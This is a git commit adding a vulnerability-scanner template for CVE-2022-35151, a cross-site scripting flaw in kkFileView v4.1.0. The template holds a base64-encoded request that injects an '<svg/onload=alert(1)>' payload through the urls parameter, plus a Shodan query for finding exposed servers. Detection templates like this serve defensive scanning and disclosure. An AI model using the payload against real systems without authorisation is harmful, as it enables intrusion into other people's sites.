Create CVE-2022-35151.yaml

patch-1
Arafat Ansari 2022-08-18 16:28:38 +05:30 committed by GitHub
parent b867ed6ef5
commit d591728dcd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2022-35151
info:
name: kkFileView v4.1.0 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
kkFileView v4.1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35151
- https://github.com/kekingcn/kkFileView/issues/366
metadata:
shodan-query: http.html:"kkFileView"
verified: "true"
tags: xss,cve,2022
requests:
- raw:
- |
GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<svg/onload=alert(1)>'